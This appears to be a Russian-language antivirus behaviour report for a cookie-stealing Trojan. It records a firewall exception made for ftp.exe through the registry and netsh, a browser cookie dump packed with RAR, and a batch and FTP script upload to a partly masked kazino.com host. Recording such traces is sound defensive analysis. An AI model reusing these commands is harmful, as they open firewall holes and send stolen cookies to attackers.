Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '<SYSTEM32>\ftp.exe' = '<SYSTEM32>\ftp.exe:*:Enabled:ENABLE'
- '%TEMP%\1.tmp\RAR.EXE' a cook_dump.bin .\CRNJEUFU_Thu 06/27/2013 -v8192k -vn
- '<SYSTEM32>\ftp.exe' -s:"%TEMP%\1.tmp\ftpserv.cmd"
- '<SYSTEM32>\netsh.exe' firewall add allowedprogram <SYSTEM32>\ftp.exe ENABLE
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\SEND.BAT" "
- %TEMP%\1.tmp\RAR.EXE
- %TEMP%\1.tmp\cook_dump.bin
- %TEMP%\1.tmp\SEND.BAT
- %TEMP%\1.tmp\ftpserv.cmd
- %TEMP%\1.tmp\RAR.EXE
- %TEMP%\1.tmp\SEND.BAT
- %TEMP%\1.tmp\cook_dump.bin
- %TEMP%\1.tmp\ftpserv.cmd
- 'ft#.##kazino.com':21
- 'localhost':1037
- DNS ASK ft#.##kazino.com